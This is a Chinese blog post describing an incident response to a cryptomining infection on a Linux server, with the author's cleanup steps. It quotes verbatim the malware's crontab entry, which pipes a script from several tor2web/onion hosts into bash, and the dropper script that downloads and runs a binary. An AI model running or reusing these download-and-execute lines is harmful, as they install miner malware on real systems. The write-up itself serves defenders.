一次服务器中病毒挖矿事件处理

最新推荐文章于 2024-08-07 09:17:56 发布
最新推荐文章于 2024-08-07 09:17:56 发布
阅读量2.8k 收藏 3
点赞数 1
分类专栏: Linux 文章标签: Linux 挖矿 病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo18237095579/article/details/89376744
版权

  事情是这样的,发现 RabbitMQ 服务响应非常慢,可以说是基本不响应、无法提供服务了。这时就去服务器上面查看,发现 CPU 的资源被一个叫做UxYhf8的程序严重占用。

第一次处理

  看到 CPU 飙升太高,发现这个程序也不是自己所知道的任何一个程序,所以就怀疑中挖矿病毒了。首先把这个程序给kill掉,只能先kill掉了,不然卡的都快无法操作了。

# 34534:挖矿程序的 pid
$ kill -9 34534

  这时 CPU 的资源已经被释放,RabbitMQ 服务也正常了。但是好景不长,没过几分钟就又出来一个新的未知进程IUfh8f(事后经过测试,新进程出现的时间在几分钟到几十分钟变化),这时就想到是不是有定时任务,查看定时任务:

$ crontab -e
10 * * * * (wget -qO- -U- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || curl -fskL -A- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.in.net/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.in.net/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.tor2web.me/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.tor2web.me/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.nz/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.nz/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.ws/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.ws/i.sh)|bash

  此 i.sh 脚本内容多变,大致如一下:

# i.sh 脚本的内容是
exec &>/dev/null
if ! ps -p $(< /tmp/.X11-lock); then
    x=./.y
    wget -qU- http://malwregafeg2fdjn.tor2web.xyz/.$(uname -m) -O$x;chmod 777 $x;$x;rm -f $x
fi

  发现了这么一个定时任务。把它删掉并清理所有定时相关文件:/etc/cron.d 目录下、/var/spool/cron/ 目录下。至此结束(自认为结束)。

第二次处理

  在第一次处理的结果上发现过段时间,挖矿程序又出现了。这是知道问题没有那么简单。可能还残留病毒文件。最后找到几个病毒程序,如下:

/usr/lib/systemd/systemd-logind
/sbin/agetty
/sbin/agetty

$ ps aux | grep -v grep | grep "agetty"
root     26432  0.0  0.0 110044   824 tty1     Ss+  15:15   0:00 /sbin/agetty --noclear tty1 linux
root     26434  0.0  0.0 110044   784 ttyS0    Ss+  15:15   0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
$ ps aux | grep -v grep | grep "systemd-logind"
root       502  0.0  0.0  24204  1680 ?        Ss    2018   0:52 /usr/lib/systemd/systemd-logind
  1. 先删掉病毒文件
  2. 杀死病毒程序,一定要多执行几次,我执行了好几次才杀掉。
$ ps aux | grep -v grep | grep "agetty" | awk '{print $2}' | xargs kill -9 && ps aux | grep -v grep | grep "systemd-logind" | awk '{print $2}' | xargs kill -9

  至此,完全搞定。

大漠知秋
关注
专栏目录
《网络安全自学教程》- 挖矿病毒排查思路和处置步骤
wangyuxiang946的博客
05-05 2万+
首先根据CPU占用率确定确定挖矿进程,找到母体文件并清除。 而后是检查计划任务、启动项挖矿木马的持久化操作,杜绝复发。 最后通过账号、日志、母体文件等信息,溯源攻击路径。
服务器挖矿病毒的检测及删除方法
penriver的博客
12-13 8513
本文提供了服务器挖矿病毒的检测及删除方法,供有需要的IT人员使用。 最近一段时间,公司内网的linux服务器无故CPU占用很高,导致系统缓慢,严重影响研发部的正常工作。 经排查是部分linux服务器挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢。
服务器挖矿病毒怎么解决
m0_70754056的博客
07-14 1823
挖矿病毒是指通过利用计算机的计算资源进行加密货币掘的恶意软件。它能够隐藏在云服务器,从而利用服务器的计算资源来进行挖矿。这样的病毒不仅会损害您的服务器,而且还会缩短其使用寿命和性能。今天,我们将向您介绍如何彻底清除云服务器上的挖矿病毒
Linux服务器挖矿病毒彻底清除与防护实操指南
最新发布
boydoy1987的专栏
08-07 715
Linux服务器在遭受挖矿病毒攻击时,会严重影响其性能和数据安全。本文将提供一套详细的操作步骤,结合实际案例,帮助您彻底清除Linux服务器上的挖矿病毒,并实施有效的防护措施。
Linux服务器挖矿病毒处理
自己在学习过程中的总结
06-19 1943
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
服务器遭遇挖矿怎么办?
2401_84466316的博客
06-03 1595
我们先来了解下虚拟货币,以比特币为例,比特币是一种由开源的P2P软件产生的网络虚拟货币,它不依靠特定货币机构发行,通过特定算法的大量计算产生,比特币经济使用整个P2P网络众多节点构成的分布式数据库来确认并记录所有的交易行为。矿工需要为比特币网络提供的算法来换取比特币,每一个比特币的节点都会收集所有尚未确认的交易,并将其归集到一个数据块,矿工节点会附加一个随机调整数,并计算前一个数据块的SHA-256散列运算值。
服务器挖矿病毒kinsing的临时处理方法
企业数字化转型卫淼全栈技术工作室
06-02 966
ps -aux | grep kinsing病毒名,查找病毒进程,然后杀死进程,如果杀死后,还会生成,那就查计划任务是否也被篡改了,crontab -l命令查看当前登录的用户计划任务,如果有异常的计划任务,那么就使用crontab -r命令删除所有的计划任务,删除ssh无密登录的秘钥(cd ~/.ssh )。一般解决kinsing病毒的方法,是top c 查100%的进程,并获取进程pid,然后使用。服务器挖矿病毒,非常郁闷,删了还继续,最后使用了两种方式,暂时解决病毒问题。3、服务器漏洞升级、打补丁。
一次服务器挖矿病毒的检测及删除方法
zhimeng1的博客
09-20 235
2023年9月18日,周一上班,有人反馈生产环境已经登录不了,陆陆续续反馈人越来越多,感觉大事不妙,脊背发凉,所有的网站和平台。5、突然想到公司做过等保测评,还有日志审计服务器,查询到下图,是通过跳板机,试错密码登录到内网,然后进行部署内部服务器的,这台服务器也是唯一一个不曾180天定时修改密码的服务器。确保您的服务器始终保持最新的安全补丁和软件版本,并定期进行安全审计和扫描,以确保您的服务器始终保持安全。间docker修复,又挂掉,iptables又莫名被删除,一天来来回回的折腾七八次。
【实战】记录一次服务器挖矿病毒处理
weixin_45694388的博客
07-25 1603
信息收集及kill: 查看监控显示长期CPU利用率超高,怀疑病毒 top 命令查看进程资源占用: netstat -lntupa 命令查看有无ip进行发包 netstat -antp 然而并没有找到对应的进程名 查看java进程和solr进程 ps aux :查看所有进程 除相关进程:kill -9(无条件退出进程) 为了防止有定时任务,再次启动恶意进程 crontab -l 命令查看正在进行的定时任务 crontab -r 删除所有定时任务 居然没有???? 保存样本,删除
一次centos挖矿病毒处理经过
a345203172的专栏
10-08 1670
环境:centos7.6 挖矿进程:rabiit 1、先关闭无用对外端口 (例如redis端口,mysql端口等),限制可以ssh登录的ip地址,可以用last查看近期远程登录的用户,确认是否存在可疑IP或者用户 2、查看定时任务情况(这个可以查看/var/log/cron文件,是否存在可疑定时任务执行日志),查看可以定时任务的启动位置,删除可疑定时任务 crontab -e /var/spool/cron/ /etc/crontab /etc/cr...
centos6.8服务器挖矿程序病毒的解决方法
emtit2008的专栏
09-04 934
阿里云提示我的centos服务器出现紧急安全事件:挖矿程序;同时也出现服务器异常登录事件。 出现这样的情况,需要根据以下的步骤去处理 第一步:修改登录的帐号密码,输入命令passwd,根据提未修改。 第二步:禁用可疑的IP,阿里云会有一些IP提示,先把异常登录的IP禁用;命令如下 iptables -I INPUT -s 68.183.140.39 -j DROP //禁用指定的IP ...
阿里云服务器挖矿病毒解决办法(已实践)
qq_49182770的博客
02-13 8412
1、cpu过高,病毒了 2、进入Linux连接阿里云服务器 3、使用top命令动态查看cpu占用率 两种情况 1、未发现占用率很高的进程,跳到第七步 2、发现了占用率很高的进程,使用kill -9 pid 杀死进程会发现病毒继续出现,没用,跳到第四步 4、查看病毒文件地址 输入 ls -l /proc/{病毒PID}/exe 查看病毒路径 5、进入病毒文件,将其统统删除 6、kill 杀死进程,完成,再次查看cpu,无病毒进程搞定 7、如果阿里云服务器显示c.
关于服务器被挂挖矿病毒的解决方案
AnblackCat的学习笔记
12-30 2075
今天在玩阿里服务器的时候,突然服务器就变得非常的卡,敲几个字母就要卡一下,我第一反应是内存是不是满了,因为我用的是一个2G运存的服务器,内存满的情况也发生过很多次 但是这次就很反常,内存非但没有满,甚至还有很多 free 的空间,那么就还有一种情况就是 cpu 爆了 看了之后,发现有一个叫 kdevtmpfsi 的进程,这个进程我没有装过也不知道是个啥,结果去百度了一下,发现是一个...
云主机被挖矿病毒感染的处理过程
小明和一群狗子们
05-27 6001
舍友在宿舍喊着,我的这个云主机好卡啊,难受啊!我让他用top命令看一下CPU占用。 一看吓一跳,一个叫做sysupdate的进程占据了绝大部分的CPU资源。CPU使用率接近100%。 看来肯定是被当矿机了。 清除过程 这个病毒还不是算很变态,很多挖矿病毒,使用top命令都看不到挖矿程序的进程。 基本可以确定这个占据绝大部分cpu资源的进程sysupdate,就是挖矿程序了,我们需要先找到他。 使...
记录一次服务器挖矿病毒入侵解决办法
a546835886的博客
05-26 1620
1. 昨天发现服务器CPU资源使用率一直100%,我都惊讶了,topyikan有个bash64脚本一直运行,但是kill不掉,文件也删不了,后来百度了一圈终于发现是被挖矿了。。。 2. 定位挖矿就好解决了,查到一篇文章说修改SELINUX,强制访问控制(MAC)安全系统,还真塌麻好使, SELINUX有「disabled」「permissive」,「enforcing」3种选择。 disabled就不用说了 permissive就是Selinux有效,但是即使你违反了策略的话它让你继续操作,但是把
挖矿病毒应急处置
2301_77977773的博客
07-22 1769
windows server2016虚拟机(切记千万不要再物理机上运行挖矿病毒2024 年 7 月 22 日, 接到XX 局用户电话反馈局域网内有一些终端设备在运行一段时间后出现莫名卡顿,怀疑内网感染了挖矿病毒。客户要求查出来原因,确认出影响范围,删除相关病毒文件并找出如如何感染的,梳理出时间链。从而避免下次出现相同的问题。
Linux命令 - ps(process status)进程管理、实用查询组合
it_lihongmin的博客
02-12 2781
ps(Process Status)是linux的进程管理命令,但是只是执行ps命令这一个瞬间(快照)的进程状态。 那么说到Linux进程,就需要细说一下5种进程状态,如下表格: ps支持
嵌入式Linux串口root用户自动登录
qq_40177571的博客
02-01 1873
修改 /lib/systemd/system/serial-getty@.service内容 将 ExecStart=-/sbin/agetty -o '-p -- \\u' --keep-baud 115200,38400,9600 %I $TERM 修改为: ExecStart=-/sbin/agetty -a root --keep-baud 115200,38400,9600 %I $TERM 效果图:
linux开机直接进入命令行模式
热门推荐
大猫的博客
03-04 2万+
linux开机直接进入命令行模式 系统开机默认会进入图形界面,要切换到命令行模式还得手动Alt + F2,F3… 如果想开机直接进入命令行方法如下: 方式一: vim /etc/inittab #默认内容为: id:5:initdefault: #改为: id:3:initdefault: 修改了配置文件系统启动直接进入命令行,这时用Ctrl+Alt+F7不会进入图形界面,需要使用startx命令进入图形界面 绍一下init命令启动级别的含义(0-6): 0:停机 1:单用户形式,只roo
【转】服务器挖矿病毒的排查过程
05-25
服务器挖矿病毒是指黑客通过入侵服务器,利用服务器的计算资源进行加密货币挖矿。这种病毒的存在会导致服务器性能下降,甚至导致服务器崩溃。以下是排查服务器挖矿病毒的过程。 1. 检查CPU和内存使用率 服务器挖矿病毒会占用服务器的大量计算资源,导致CPU和内存使用率异常升高。通过检查系统监视器或者运行top命令,可以查看当前的CPU和内存使用率,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 2. 检查网络流量 服务器挖矿病毒需要与矿池进行通信,因此会产生大量的网络流量。通过检查网络监视器或者运行iftop命令,可以查看当前的网络流量,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 3. 检查进程列表 服务器挖矿病毒会在服务器上运行挖矿程序,因此会在进程列表留下痕迹。通过运行ps命令,可以查看当前的进程列表,如果发现有可疑的进程,则很可能是服务器挖矿病毒导致的。 4. 检查系统日志 服务器挖矿病毒会在服务器上留下痕迹,因此可以通过检查系统日志来发现异常行为。通过查看/var/log/auth.log、/var/log/syslog等系统日志文件,可以查找异常登录或者异常命令执行的记录,如果发现可疑行为,则很可能是服务器挖矿病毒导致的。 5. 检查防火墙日志 服务器挖矿病毒需要与矿池进行通信,因此需要打开服务器的防火墙端口。通过检查防火墙日志,可以查看服务器上的网络连接情况,如果发现与矿池的连接,则很可能是服务器挖矿病毒导致的。 以上是排查服务器挖矿病毒的基本过程,如果发现服务器确实感染了挖矿病毒,则需要及时采取措施清除病毒,并加强服务器的安全防护措施,避免类似的攻击再次发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值